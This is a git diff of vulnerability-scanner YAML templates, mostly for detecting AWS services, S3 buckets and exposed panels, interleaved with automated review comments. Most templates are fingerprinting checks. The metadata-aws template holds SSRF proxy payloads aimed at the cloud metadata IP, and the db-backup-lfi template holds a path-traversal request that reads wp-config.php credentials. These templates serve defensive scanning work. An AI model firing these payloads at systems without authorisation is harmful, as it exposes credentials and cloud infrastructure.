--- a/poc/aws/aws-cloudfront-service-635.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - description: Detect websites using AWS cloudfront service - tags: aws,tech,service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/poc/aws/aws-cognito-638.yaml b/poc/aws/aws-cognito-638.yaml deleted file mode 100644 index bbbd1d4b26..0000000000 --- a/poc/aws/aws-cognito-638.yaml +++ /dev/null 
@@ -1,32 +0,0 @@ -id: aws-cognito-pool - -info: - name: AWS Cognito Pool ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "ap-northeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-northeast-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-southeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ap-south-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "ca-central-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "eu-north-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-east-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" - - "sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}" \ No newline at end of file diff --git a/poc/aws/aws-ecs-container-agent-tasks-641.yaml b/poc/aws/aws-ecs-container-agent-tasks-641.yaml deleted file mode 100644 index 7f34b5c337..0000000000 
--- a/poc/aws/aws-ecs-container-agent-tasks-641.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-ecs-container-agent-tasks - -info: - name: aws-ecs-container-agent-tasks - author: dogasantos - severity: info - tags: aws,docker,ec2 - description: Aws container metadata content - reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect - -requests: - - method: GET - path: - - "{{BaseURL}}/v1/metadata" - - "{{BaseURL}}/v1/tasks" - - matchers-condition: and - matchers: - - type: word - words: - - "arn:aws:ecs" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/aws/aws-elastic-beanstalk-detect-644.yaml b/poc/aws/aws-elastic-beanstalk-detect-644.yaml index e77c6060ce..00c2a3d8da 100644 --- a/poc/aws/aws-elastic-beanstalk-detect-644.yaml +++ b/poc/aws/aws-elastic-beanstalk-detect-644.yaml @@ -1,11 +1,14 @@ id: elastic-beanstalk-detect + info: name: AWS Elastic Beanstalk Detect author: pussycat0x severity: info + metadata: + max-request: 1 tags: aws,tech,beanstalk -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -28,3 +31,5 @@ requests: group: 1 regex: - '([A-Za-z -]+)<\/title>' + +# digest: 4a0a0047304502205248c4f04864e4ced28b39f71a3a85e4985860aba6b016c3a062c7ab1977aae5022100c886094c2eebe7cb056a7f0ad732908fe42e17837b520a66924972d7f5a8acd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-elastic-beanstalk-detect.yaml b/poc/aws/aws-elastic-beanstalk-detect.yaml deleted file mode 100644 index 9c88c7b2ae..0000000000 --- a/poc/aws/aws-elastic-beanstalk-detect.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: elastic-beanstalk-detect - -info: - name: AWS Elastic Beanstalk Detect - author: pussycat0x - severity: info - tags: aws,tech,beanstalk - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>' - - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '<title>([A-Za-z -]+)<\/title>' diff --git a/poc/aws/aws-object-listing-646.yaml b/poc/aws/aws-object-listing-646.yaml index 2748d21094..53d6e67684 100644 --- a/poc/aws/aws-object-listing-646.yaml +++ b/poc/aws/aws-object-listing-646.yaml @@ -4,7 +4,8 @@ info: name: AWS bucket with Object listing author: pdteam severity: low - reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + reference: + - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 tags: aws,misconfig,bucket requests: diff --git a/poc/aws/aws-object-listing.yaml b/poc/aws/aws-object-listing.yaml index 53d6e67684..c533985d46 100644 --- a/poc/aws/aws-object-listing.yaml +++ b/poc/aws/aws-object-listing.yaml @@ -6,25 +6,28 @@ info: severity: low reference: - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + metadata: + max-request: 1 tags: aws,misconfig,bucket -requests: +http: - method: GET path: - "{{BaseURL}}" max-size: 1000 + matchers-condition: and matchers: - type: word + part: body words: - '<ListBucketResult xmlns=' - part: body - type: word + part: header words: - application/xml - part: header extractors: - type: regex 
@@ -32,3 +35,5 @@ requests: group: 1 regex: - '<Name>([a-z0-9-._]+)' + +# digest: 490a004630440220241734b1058c61b2680b91381de5ef764c8084dafaf90bb34937bb487c02a09a0220186a3e1705a656fc3c537017e087c1a47b0f47c15cf059ddbc012e0c2e53e1d6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-opensearch-login-649.yaml b/poc/aws/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..ffd32b7e76 --- /dev/null +++ b/poc/aws/aws-opensearch-login-649.yaml @@ -0,0 +1,24 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: + - method: GET + path: + - '{{BaseURL}}/_dashboards/app/login' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/aws/aws-opensearch-login-650.yaml b/poc/aws/aws-opensearch-login-650.yaml deleted file mode 100644 index 14f111d73a..0000000000 --- a/poc/aws/aws-opensearch-login-650.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aws-opensearch-login - -info: - name: AWS OpenSearch Default Login - author: Higor Melgaço (eremit4) - severity: medium - description: Searches for the AWS OpenSearch login page - reference: - - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ - tags: panel,opensearch,aws - -requests: - - method: GET - path: - - '{{BaseURL}}/_dashboards/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Please login to OpenSearch Dashboards" \ No newline at end of file diff --git a/poc/aws/aws-opensearch-login.yaml b/poc/aws/aws-opensearch-login.yaml index ffd32b7e76..14f111d73a 100644 --- a/poc/aws/aws-opensearch-login.yaml +++ b/poc/aws/aws-opensearch-login.yaml 
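Review bot: The new poc/aws/aws-opensearch-login-649.yaml is named `AWS OpenSearch Default Login` and rated `severity: medium`, but its request only fetches `/_dashboards/app/login` and matches the login-page text. No credentials are submitted, and its own description and `panel` tag say it searches for the login page. The other panel detections in this commit (Zabbix, ZeroShell) are `severity: info`, and the default-login templates here actually post a username and password. Using `severity: info` and a name such as `AWS OpenSearch Dashboards Login Panel` would stop triage from reading an exposed login page as a confirmed default-credential finding. The same `severity: medium` is visible in poc/aws/aws-opensearch-login.yaml in the following hunk.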
@@ -5,7 +5,8 @@ info: author: Higor Melgaço (eremit4) severity: medium description: Searches for the AWS OpenSearch login page - reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + reference: + - https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ tags: panel,opensearch,aws requests: diff --git a/poc/aws/aws-redirect-651.yaml b/poc/aws/aws-redirect-651.yaml new file mode 100644 index 0000000000..010dbbfeca --- /dev/null +++ b/poc/aws/aws-redirect-651.yaml @@ -0,0 +1,24 @@ +id: aws-redirect + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: info + reference: https://link.medium.com/fgXKJHR9P7 + tags: aws + +requests: + - method: GET + path: + - '{{BaseURL}}' + + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/poc/aws/aws-redirect-652.yaml b/poc/aws/aws-redirect-652.yaml index 1826635a49..5139ec2cf7 100644 --- a/poc/aws/aws-redirect-652.yaml +++ b/poc/aws/aws-redirect-652.yaml @@ -4,21 +4,28 @@ info: name: Subdomain takeover AWS S3 author: manikanta a.k.a @secureitmania severity: info - reference: https://link.medium.com/fgXKJHR9P7 - tags: aws,takeover + reference: + - https://link.medium.com/fgXKJHR9P7 + metadata: + max-request: 1 + tags: aws,takeover,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}' redirects: false + matchers-condition: and matchers: - type: status status: - 307 + - type: word words: - 'Location: https://aws.amazon.com/s3/' part: header + +# digest: 490a00463044022038d49c43c034741635f5906995d2086bea2c3ccb11f7ac3989e134be6dad6c4c0220240bbd1c05f5f3e7da66d82eb890b742893949997923f19c220f83a45fe5640c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/awstats-config-656.yaml b/poc/aws/awstats-config-656.yaml new file mode 100644 index 0000000000..32342ff234 --- /dev/null +++ b/poc/aws/awstats-config-656.yaml 
@@ -0,0 +1,36 @@ +id: awstats-config + +info: + name: AWStats Config - Detect + author: sheikhrishad + severity: info + description: AWStats configuration information was detected. + reference: https://www.awstats.org/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 2 + tags: config,exposure,awstats + +http: + - method: GET + path: + - "{{BaseURL}}/awstats/" + - "{{BaseURL}}/awstats.conf" + + matchers: + - type: word + words: + - "AWSTATS CONFIGURE" + - "MAIN SETUP SECTION" + condition: and + + - type: word + words: + - "Index of /awstats" + - "Parent Directory" + condition: and + +# digest: 4a0a0047304502206b7aad743ab80b0e99d36916f873a93b404aef56265091294d37d197bf03cf9b0221008d3f8603824fc2ddb96488acbb6699bdfd4e0fa0b46d2a1cef249ecc8a3f84be:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/awstats-config.yaml b/poc/aws/awstats-config.yaml deleted file mode 100644 index 9a4cb3cb84..0000000000 --- a/poc/aws/awstats-config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: awstats-config - -info: - name: AWStats config - author: sheikhrishad - severity: info - tags: config,exposure,awstats - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats/" - - "{{BaseURL}}/awstats.conf" - - matchers: - - type: word - words: - - "AWSTATS CONFIGURE" - - "MAIN SETUP SECTION" - condition: and - - - type: word - words: - - "Index of /awstats" - - "Parent Directory" - condition: and \ No newline at end of file diff --git a/poc/aws/awstats-script-657.yaml b/poc/aws/awstats-script-657.yaml new file mode 100644 index 0000000000..9a81b722f3 --- /dev/null +++ b/poc/aws/awstats-script-657.yaml 
@@ -0,0 +1,29 @@ +id: awstats-script + +info: + name: AWStats script + author: sheikhrishad + severity: info + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/awstats.pl" + - "{{BaseURL}}/logs/awstats.pl" + - "{{BaseURL}}/webstats/awstats.pl" + + matchers-condition: and + matchers: + - type: word + words: + - "Do not remove this line" + + - type: word + words: + - "application/x-perl" + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/aws/awstats-script-658.yaml b/poc/aws/awstats-script-658.yaml deleted file mode 100644 index 3631c6a328..0000000000 --- a/poc/aws/awstats-script-658.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: awstats-script - -info: - name: AWStats script - author: sheikhrishad - severity: info - tags: config,exposure,awstats - -requests: - - method: GET - path: - - "{{BaseURL}}/awstats.pl" - - "{{BaseURL}}/logs/awstats.pl" - - "{{BaseURL}}/webstats/awstats.pl" - - matchers-condition: and - matchers: - - type: word - words: - - "Do not remove this line" - - - type: word - part: header - words: - - "application/x-perl" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/aws/awstats-script.yaml b/poc/aws/awstats-script.yaml index 9a81b722f3..adba3a58d9 100644 --- a/poc/aws/awstats-script.yaml +++ b/poc/aws/awstats-script.yaml @@ -1,12 +1,20 @@ id: awstats-script info: - name: AWStats script + name: AWStats Script Config - Detect author: sheikhrishad severity: info - tags: config,exposure + description: AWStats configuration information was detected. + reference: https://www.awstats.org/docs/awstats_setup.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 3 + tags: config,exposure,awstats -requests: +http: - method: GET path: - "{{BaseURL}}/awstats.pl" 
@@ -20,10 +28,12 @@ requests: - "Do not remove this line" - type: word + part: header words: - "application/x-perl" - part: header - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a0046304402204f71ad3871161383a0092af92b73b53f55d28c9d90c224436c41e0af70ae4e7502205f6ac0ca14d346bce6b6618733b105f79b64752ef8b1af2b39da2588676e35ef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/ec2-detection-7162.yaml b/poc/aws/ec2-detection-7162.yaml deleted file mode 100644 index 2c3025f2eb..0000000000 --- a/poc/aws/ec2-detection-7162.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: ec2-detection - -info: - name: AWS EC2 detection - author: melbadry9 - severity: info - tags: dns,ec2,aws - reference: https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state - -dns: - - name: "{{FQDN}}" - type: CNAME - - extractors: - - type: regex - regex: - - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" - - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" diff --git a/poc/aws/ec2-detection-7163.yaml b/poc/aws/ec2-detection-7163.yaml new file mode 100644 index 0000000000..9ffb7ee163 --- /dev/null +++ b/poc/aws/ec2-detection-7163.yaml @@ -0,0 +1,24 @@ +id: ec2-detection + +info: + name: AWS EC2 Detection + author: melbadry9 + severity: info + description: Amazon Elastic Compute Cloud (EC2) detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state + classification: + cwe-id: CWE-200 + tags: dns,ec2,aws + +dns: + - name: "{{FQDN}}" + type: CNAME + + extractors: + - type: regex + regex: + - "ec2-[-\\d]+\\.compute[-\\d]*\\.amazonaws\\.com" + - "ec2-[-\\d]+\\.[\\w\\d\\-]+\\.compute[-\\d]*\\.amazonaws\\.com" + +# Enhanced by mp on 2022/03/14 diff --git a/poc/aws/metadata-aws-8812.yaml b/poc/aws/metadata-aws-8812.yaml index 3a5e11cb49..6674f52436 100644 --- a/poc/aws/metadata-aws-8812.yaml +++ b/poc/aws/metadata-aws-8812.yaml 
@@ -2,29 +2,32 @@ id: metadata-service-aws # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Amazon AWS Metadata Service Check - author: sullo + author: sullo,DhiyaneshDk severity: critical - description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + description: The host is configured as a proxy which allows access to the metadata provided by a cloud provider such as AWS or OVH. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. 
reference: - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - tags: exposure,proxy,aws,amazon,misconfig,metadata + - https://twitter.com/Random_Robbie/status/1268186743657947137 + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery# classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 + metadata: + max-request: 4 + tags: exposure,proxy,aws,amazon,misconfig,metadata -requests: +http: - raw: - |+ GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 @@ -32,9 +35,10 @@ requests: payloads: hostval: - - aws.interact.sh + - aws.oast.online - 169.254.169.254 - + - 2852039166 # decimal encoding + - 169.254.169.254.nip.io unsafe: true matchers: - type: word @@ -43,3 +47,5 @@ requests: - "public-ipv4" - "privateIp" condition: or + +# digest: 4b0a00483046022100aaea6b60c84ab81c627ae7f0e712e68c83ca1f2deda1ad5b7d59be164e096642022100837009bd37d871f253921986b407d4b2b2a39619fcd568626a2a8b68e1fbcc25:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/metadata-aws.yaml b/poc/aws/metadata-aws.yaml deleted file mode 100644 index 1467afc69a..0000000000 --- a/poc/aws/metadata-aws.yaml +++ /dev/null 
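Review bot: The `hostval` payload list now relies on two third-party DNS names, `aws.oast.online` and `169.254.169.254.nip.io`, so the outcome of a `severity: critical` check depends on records the template maintainers do not control. A comment beside each entry stating what it is expected to resolve to would let operators verify that before trusting a result. The matcher kept as context in the last hunk accepts either `public-ipv4` or `privateIp` anywhere in the body with no status check, which is thin evidence for a critical finding; `matchers-condition: and` together with a `- type: status` matcher on `200` would cut false positives. The description was also widened to "AWS or OVH" while `name` and the remediation still speak only of AWS and IMDSv2.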
@@ -1,41 +0,0 @@ -id: metadata-service-aws -# This attack abuses a misconfigured proxy that allows access to the metadata -# IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. -# -# The proxy may also be vulnerable to host/port enumeration on localhost or -# inside the private network. -info: - name: Amazon AWS Metadata Service Check - author: sullo - severity: critical - description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - reference: - - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html - - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - tags: exposure,proxy,aws,amazon,misconfig,metadata - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 9.3 - cwe-id: CWE-441 -requests: - - raw: - - |+ - GET http://{{hostval}}/latest/meta-data/ HTTP/1.1 - Host: {{hostval}} - - payloads: - hostval: - - aws.interact.sh - - 169.254.169.254 - unsafe: true - matchers: - - type: word - part: body - words: - - "public-ipv4" - - "privateIp" - condition: or diff --git a/poc/aws/s3-bucket.yaml b/poc/aws/s3-bucket.yaml index c7927575ef..d542011f1c 100644 --- a/poc/aws/s3-bucket.yaml +++ b/poc/aws/s3-bucket.yaml @@ -1,4 +1,5 @@ id: s3-bucket + info: name: S3 Bucket Detect author: gaurang @@ -7,6 +8,7 @@ info: file: - extensions: - all + extractors: - type: regex regex: 
@@ -15,3 +17,5 @@ file: - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)" - "//s3\\.amazonaws\\.com/[a-z0-9._-]+" - "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" + +# digest: 4a0a00473045022100b23c497ae4dd1fda00fd382b868f55618111dba8e8d6182aacae04b31862b13102202165998551fea5da9c88dc506c8b8cdbf90a78885e7f51c83b52f6c77bb7a9ae:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/s3-detect-9964.yaml b/poc/aws/s3-detect-9964.yaml index 7868591be0..a7fdcd87d1 100644 --- a/poc/aws/s3-detect-9964.yaml +++ b/poc/aws/s3-detect-9964.yaml @@ -1,14 +1,29 @@ id: s3-detect + info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info -requests: + metadata: + max-request: 1 + tags: aws,s3,bucket,tech + +http: - method: GET path: - "{{BaseURL}}/%c0" + + matchers-condition: or matchers: - type: regex + part: body regex: - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" - part: body + + - type: dsl + dsl: + - 'contains(to_lower(server), "amazons3")' + - 'contains(to_lower(header), "x-amz-id")' + - 'contains(to_lower(header), "x-amz-request-id")' + +# digest: 4b0a00483046022100e4d62de5d67e017609c9e06ca9dcc8a840a222db5d65cb83201b7d13bb84dfa4022100efc723578b13403d1c4216dfc6add252cd5c7423d8e64045293962a21497a063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/s3-subtakeover-9968.yaml b/poc/aws/s3-subtakeover-9968.yaml deleted file mode 100644 index 19aa26d7bb..0000000000 --- a/poc/aws/s3-subtakeover-9968.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: s3-subtakeover -info: - name: Subdomain takeover AWS S3 - author: manikanta a.k.a @secureitmania - severity: high - # Source:- https://link.medium.com/fgXKJHR9P7 -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: false - matchers-condition: and - matchers: - - type: status - status: - - 307 - - type: word - words: - - 'Location: https://aws.amazon.com/s3/' - part: header diff --git a/poc/aws/s3-subtakeover-9969.yaml b/poc/aws/s3-subtakeover-9969.yaml new file mode 100644 index 0000000000..6d3d3022a5 --- /dev/null 
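Review bot: With the added `matchers-condition: or` in s3-detect-9964.yaml, the new `dsl` matcher reports Amazon S3 on any response whose headers contain `x-amz-id` or `x-amz-request-id`. Those header names are also emitted by S3-compatible object stores that are not Amazon, so a hit really means "speaks the S3 API". The three DSL expressions are themselves OR-ed because no `condition` is set. If the template is meant to identify Amazon specifically, keep `contains(to_lower(server), "amazons3")` as the only standalone header signal, or state in `name` and a new `description` that compatible implementations match too.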
+++ b/poc/aws/s3-subtakeover-9969.yaml @@ -0,0 +1,24 @@ +id: s3-subtakeover + +info: + name: Subdomain takeover AWS S3 + author: manikanta a.k.a @secureitmania + severity: high + + # Source:- https://link.medium.com/fgXKJHR9P7 + + +requests: + - method: GET + path: + - '{{BaseURL}}' + redirects: false + matchers-condition: and + matchers: + - type: status + status: + - 307 + - type: word + words: + - 'Location: https://aws.amazon.com/s3/' + part: header diff --git a/poc/backup/adb-backup-enabled-60.yaml b/poc/backup/adb-backup-enabled-60.yaml index 2f4a88df0a..7c0ecdd321 100644 --- a/poc/backup/adb-backup-enabled-60.yaml +++ b/poc/backup/adb-backup-enabled-60.yaml @@ -1,16 +1,23 @@ id: adb-backup-enabled - info: name: ADB Backup Enabled + description: ADB Backup is enabled, which allows the backup and restore of an app's private data. + remediation: Ensure proper access or disable completely. author: gaurang severity: low tags: android,file - + reference: + -https://adb-backup.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 file: - extensions: - all - matchers: - type: word words: - - "android:allowBackup=\"true\"" \ No newline at end of file + - "android:allowBackup=\"true\"" + +# Enhanced by mp on 2022/02/09 diff --git a/poc/backup/db-backup-lfi-6774.yaml b/poc/backup/db-backup-lfi-6774.yaml deleted file mode 100644 index 5541cb013c..0000000000 --- a/poc/backup/db-backup-lfi-6774.yaml +++ /dev/null 
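Review bot: The added s3-subtakeover template reports `severity: high` but its `info` block has no `description`, `reference`, `remediation` or `tags`, and the only source is a YAML comment. The finding therefore cannot be selected by tag and gives the recipient nothing to act on. Move the link into `reference: - https://link.medium.com/fgXKJHR9P7` and add a `tags:` line plus a description stating that a 307 redirect to `https://aws.amazon.com/s3/` is treated as the indicator. That redirect may not by itself show that the bucket name is unclaimed, so the description should tell the reader to confirm the DNS record and bucket ownership before treating the host as affected. The file also uses the legacy `requests:` key.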
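Review bot: The reference entry added to adb-backup-enabled-60.yaml is written `-https://adb-backup.com/` with no space after the dash, which YAML reads as a plain string rather than a list item; it should be `- https://adb-backup.com/`. The new classification gives `cvss-score: 0.0` with an all-None impact vector while `severity: low` is kept, so the two disagree. `remediation: Ensure proper access or disable completely.` would be more useful if it named the setting, for example `remediation: Set android:allowBackup="false" in AndroidManifest.xml unless backups are required.`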
@@ -1,25 +0,0 @@ -id: db-backup-lfi -info: - name: DB Backup <= 4.5 - Path Traversal File Access - author: dhiyaneshDK - severity: high - description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. - reference: - - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 - - https://www.exploit-db.com/exploits/35378 - tags: wordpress,wp-plugin,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/poc/backup/db-backup-lfi-6775.yaml b/poc/backup/db-backup-lfi-6775.yaml new file mode 100644 index 0000000000..48dcb57edf --- /dev/null +++ b/poc/backup/db-backup-lfi-6775.yaml 
@@ -0,0 +1,30 @@ +id: db-backup-lfi + +info: + name: DB Backup <= 4.5 - Path Traversal File Access + author: dhiyaneshDK + severity: high + description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive + information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + reference: + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 + - https://www.exploit-db.com/exploits/35378 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/poc/backup/db-backup-lfi-6776.yaml b/poc/backup/db-backup-lfi-6776.yaml index 48dcb57edf..ad45d744d3 100644 --- a/poc/backup/db-backup-lfi-6776.yaml +++ b/poc/backup/db-backup-lfi-6776.yaml 
